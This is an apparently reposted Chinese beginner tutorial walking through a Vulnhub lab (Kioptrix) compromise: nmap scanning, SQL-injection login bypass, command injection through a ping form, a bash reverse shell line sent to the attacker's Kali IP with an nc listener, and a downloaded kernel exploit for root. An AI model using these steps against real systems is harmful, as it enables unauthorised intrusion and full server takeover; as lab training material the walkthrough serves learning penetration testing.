有許多人對神秘的黑客一直感興趣，卻苦于網(wǎng)上資料繁雜，無法入門，在學(xué)黑客之前，你要知道什么是黑客，黑客就是那些對計(jì)算機(jī)有著強(qiáng)烈探索欲的人，一個(gè)真正的黑客，必須要至少掌握一門編程技術(shù)和熟悉系統(tǒng)的操作命令。 下面我會實(shí)際演示一個(gè)黑客是如何通過一個(gè)普通的網(wǎng)站攻破服務(wù)器并獲取ROOT權(quán)限。

基礎(chǔ)環(huán)境準(zhǔn)備

1、安裝Vmware虛擬機(jī)(不建議使用真機(jī))；

2、前往vulnhub下載測試鏡像，下載地址

https://www.vulnhub.com/entry/kioptrix-level-12-3,24/

3、用Vmware安裝下載鏡像，安裝完成后啟動服務(wù)器(這就是我們的目標(biāo)服務(wù)器了)；

4、虛擬機(jī)安裝kali操作系統(tǒng)，kali系統(tǒng)下載地址：

https://www.kali.org/downloads/(也可以選擇其它操作系統(tǒng)，Kali關(guān)于滲透測試工具集成比較好)；

以上基礎(chǔ)環(huán)境可谷歌、百度自行安裝，有問題可以反饋留言。

備注：目標(biāo)服務(wù)器和Kali服務(wù)器網(wǎng)絡(luò)需要配置同一個(gè)網(wǎng)段，默認(rèn)選擇Vmware的橋接模式即可。

操作流程

一、Kali系統(tǒng)IP查看

基礎(chǔ)環(huán)境準(zhǔn)備完畢，這時(shí)候需要打開我們的Kali服務(wù)器了，查看Kali服務(wù)器自身的IP，敲入ifconfig命令，查看到Kali系統(tǒng)自身IP地址為192.168.137.133。

二、掃描目標(biāo)服務(wù)器IP地址

nmap -sP 192.168.137.1/24

經(jīng)過nmap掃描后發(fā)現(xiàn)，同網(wǎng)段有192.168.137.88 的IP，這個(gè)IP就是我們此行的目標(biāo)IP了。

三、掃描目標(biāo)服務(wù)器開放端口

nmap -A -p 1-65535 192.168.137.88 -v5

掃描192.168.137.88這臺服務(wù)器上開放的端口，發(fā)現(xiàn)目標(biāo)服務(wù)器開放的端口比較多，其中有常見的3306和80端口，相信有一定經(jīng)驗(yàn)的運(yùn)維或者開發(fā)人員都知道，這兩個(gè)端口代表Mysql服務(wù)和Http服務(wù)，后面攻擊這臺服務(wù)器就會通過常見的80端口進(jìn)行操作

四、SQL注入操作

用瀏覽器訪問http://192.168.137.88，發(fā)現(xiàn)是個(gè)登錄頁面，嘗試用SQL注入，可登錄到管理后臺，此SQL注入原理是由于后臺服務(wù)對用戶輸入的參數(shù)沒有進(jìn)行校驗(yàn)，直接進(jìn)行SQL拼接，導(dǎo)致出現(xiàn)該漏洞。

登錄后發(fā)現(xiàn)可看到管理員界面，這個(gè)界面是管理員用于查看機(jī)器是否能ping通的，測試輸入localhost，點(diǎn)擊submit，發(fā)現(xiàn)ping命令可以執(zhí)行，然后這時(shí)可以用&& 符號連接其他命令，發(fā)現(xiàn)都能正常執(zhí)行，這時(shí)想到我們可以利用反彈shell進(jìn)行操作。

五、反彈Shell操作

Kali機(jī)器執(zhí)行如下命令：

nc命令可以實(shí)現(xiàn)任意TCP/UDP端口的偵聽，這里nc是作為server以TCP或UDP方式偵聽4444端口(備注也可以指定其它端口)

nc -v -l -p 4444

瀏覽器上填寫如下命令：

此命令是實(shí)現(xiàn)反彈shell，sh -i 打開一個(gè)交互的sh，/dev/tcp建立一個(gè)socket連接，>&將標(biāo)準(zhǔn)錯誤輸出重定向到標(biāo)準(zhǔn)輸出中，0>&1將標(biāo)準(zhǔn)輸入重定向到標(biāo)準(zhǔn)輸出中。

localhost && sh -i >& /dev/tcp/192.168.137.133/4444 0>&1

這時(shí)候發(fā)現(xiàn)自己的Kali機(jī)器上已經(jīng)進(jìn)入shell操作界面，這時(shí)候的shell就已經(jīng)是目標(biāo)機(jī)器的shell了(偷偷的竊喜一波)

查看目前的用戶發(fā)現(xiàn)是apache用戶，權(quán)限較低，無法創(chuàng)建、操作、刪除文件，也沒有權(quán)限進(jìn)行sudo操作，如下圖所示

六、提升權(quán)限到ROOT

這時(shí)執(zhí)行 uname -a 命令，發(fā)現(xiàn)該系統(tǒng)用到的內(nèi)核是2.6.9版本，如下圖所示。

這時(shí)候就可以去谷歌搜索該內(nèi)核版本是否存在高危漏洞，或者使用searchsploit工具進(jìn)行搜索，幸運(yùn)的是，網(wǎng)上已經(jīng)有人針對該內(nèi)核版本做過提權(quán)漏洞的腳本，如下圖。

通過wget把該文件下載到服務(wù)器上，由于操作的終端是反彈shell的終端，rz命令不可用。如果文件較內(nèi)容較少，可以手動編輯，這里我是直接本地用 python -m SimpleHTTPServer起個(gè)簡單的靜態(tài)文件服務(wù)，然后在服務(wù)器用wget命令下載。

下載完成后用gcc命令編譯，然后執(zhí)行編譯后的文件，此時(shí)發(fā)現(xiàn)權(quán)限已經(jīng)由普通的apache用戶提權(quán)到root用戶了，到此大功告成了，可以徹底做自己想做的事情了。

總結(jié)

以上是生活随笔為你收集整理的kali mysql停止服务器_从零开始：手把手教你黑客入门攻破服务器并获取ROOT权限...的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。